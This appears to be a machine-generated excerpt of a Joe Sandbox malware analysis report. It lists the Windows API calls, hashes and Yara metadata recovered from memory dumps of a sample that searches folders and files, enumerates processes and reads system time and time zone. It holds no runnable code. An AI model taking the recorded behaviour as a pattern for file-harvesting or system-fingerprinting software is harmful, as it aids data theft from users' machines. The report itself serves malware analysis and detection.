                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 1066202413-0
                                                                                    • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                    • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                                                    • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                                                    • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                                                    APIs
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                                                    • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                                                    • lstrcatA.KERNEL32(?,02E35DD0), ref: 00414FAB
                                                                                    • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                                                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                                                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                                                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2667927680-0
                                                                                    • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                    • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                                                    • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                                                    • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcessstrtok_s
                                                                                    • String ID:
                                                                                    • API String ID: 3407564107-0
                                                                                    • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                    • Instruction ID: 6212ecdd1e18e84e33a811d7b2e5723e934460af97f8d04a47aefa9393dbd0af
                                                                                    • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                                                    • Instruction Fuzzy Hash: CD115BB4900219EFCB04DFE4D948AEDBB75FF14309F108469E80967250E7309B09CF65
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 02D27C17
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27C1E
                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 02D27C2B
                                                                                    • wsprintfA.USER32 ref: 02D27C5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 377395780-0
                                                                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction ID: 5d369438283fd5fd32bccd48524d73adf3b612896cb61043e73a551f07d13a3f
                                                                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction Fuzzy Hash: 651139B2944118ABCB14DFD9DD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                                                    • wsprintfA.USER32 ref: 004179F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1243822799-0
                                                                                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                                                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                                                    • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 02D27CCA
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27CD1
                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 02D27CE4
                                                                                    • wsprintfA.USER32 ref: 02D27D1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3317088062-0
                                                                                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction ID: 1d3ae8b873f91a4cde50e1d00736e3cbdc58c2248730e3f7b9e3a88c16cbb115
                                                                                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                                                    • Instruction Fuzzy Hash: D4115EB1A45228EFEB208B54DC49FA9B7B8FB05721F10439AE51AA32C0C7745944CF51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: strtok_s
                                                                                    • String ID:
                                                                                    • API String ID: 3330995566-0
                                                                                    • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                    • Instruction ID: d10518f97321af8204f5c33a4c09d35e959741170ee3d7c7a4d5c1c6232f5eb8
                                                                                    • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                                                    • Instruction Fuzzy Hash: 621106B4E00219EFDB14CFE6D948BEEBBB9FB14709F10C029E425AA250D7789905CF55
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(02D23D55,80000000,00000003,00000000,00000003,00000080,00000000,?,02D23D55,?), ref: 02D29563
                                                                                    • GetFileSizeEx.KERNEL32(000000FF,02D23D55), ref: 02D29580
                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 02D2958E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                    • String ID:
                                                                                    • API String ID: 1378416451-0
                                                                                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction ID: 5af9233eb822fc5f47dd06113751a2544a54284ff6ec565cb2aa81bbfb62a6f5
                                                                                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                                                    • Instruction Fuzzy Hash: 6BF01939F40208BBDB20DFB0DC59BDA77BAAB49710F208694BA11A7280D6359A058B40
                                                                                    APIs
                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D31
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D26D4F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D26D60
                                                                                    • Sleep.KERNEL32(00001770), ref: 02D26D6B
                                                                                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 02D26D81
                                                                                    • ExitProcess.KERNEL32 ref: 02D26D89
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                    • String ID:
                                                                                    • API String ID: 941982115-0
                                                                                    • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                    • Instruction ID: 9fd2416f0b4f89e1a53fb981ee7640f479d13ac962ea776039b910b6bdd0a1d0
                                                                                    • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                                                    • Instruction Fuzzy Hash: B9F05478580329EFE710ABE1DC04BBD7679EB25749F101514F50255390DBB0C909CEA6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: `o@
                                                                                    • API String ID: 0-590292170
                                                                                    • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                    • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                                                    • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                                                    • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • GetSystemTime.KERNEL32(?,02E04F30,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SystemTimelstrcpy
                                                                                    • String ID: cI@$cI@
                                                                                    • API String ID: 62757014-1697673767
                                                                                    • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                    • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                                                                    • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                                                                                    • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                                                                    APIs
                                                                                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                                                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                                                                    • lstrcatA.KERNEL32(?,02E39CF8), ref: 004150A8
                                                                                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                                                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                                                                    • String ID: aA
                                                                                    • API String ID: 2699682494-2567749500
                                                                                    • Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                    • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                                                                    • Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
                                                                                    • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D1A077: memcmp.MSVCRT(?,00421264,00000003), ref: 02D1A094
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1BF06
                                                                                      • Part of subcall function 02D29097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02D290B9
                                                                                    • StrStrA.SHLWAPI(00000000,004213E0), ref: 02D1BF34
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1C00C
                                                                                    • lstrlen.KERNEL32(00000000), ref: 02D1C020
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1440504306-0
                                                                                    • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                    • Instruction ID: a07429445f16bbd48e9e905924f60887a6ddb3dbb8f68fe17abe9d775e127a42
                                                                                    • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                                                                    • Instruction Fuzzy Hash: CDB11C75910228EBCF18EBA0DD95EEE733AEF64708F504169E50662690EE346E4CCF71
                                                                                    APIs
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D251E1
                                                                                    • lstrcat.KERNEL32(?,00421070), ref: 02D251FE
                                                                                    • lstrcat.KERNEL32(?,0064A5F8), ref: 02D25212
                                                                                    • lstrcat.KERNEL32(?,00421074), ref: 02D25224
                                                                                      • Part of subcall function 02D24B77: wsprintfA.USER32 ref: 02D24B93
                                                                                      • Part of subcall function 02D24B77: FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
                                                                                      • Part of subcall function 02D24B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
                                                                                      • Part of subcall function 02D24B77: FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
                                                                                      • Part of subcall function 02D24B77: FindClose.KERNEL32(000000FF), ref: 02D24DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2667927680-0
                                                                                    • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                    • Instruction ID: f5a8541b64f9bf550549d44b5eeec0ffb5b853a3e91ac2b44e28492c8386360b
                                                                                    • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                                                                    • Instruction Fuzzy Hash: FF21B87AA40218BBC714FBE0EC45EE9737AEB65300F404188764992280DE749ACDCFB1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1206339513-0
                                                                                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction ID: 00bb18a8a58d96ce1557579acf3de89063e437dc9164e52b57040724408ed84d
                                                                                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                                                                    • Instruction Fuzzy Hash: ED010879640108FFCB04DFECD998EAE7BBAEB49394F108148F9098B300C631AA40CB95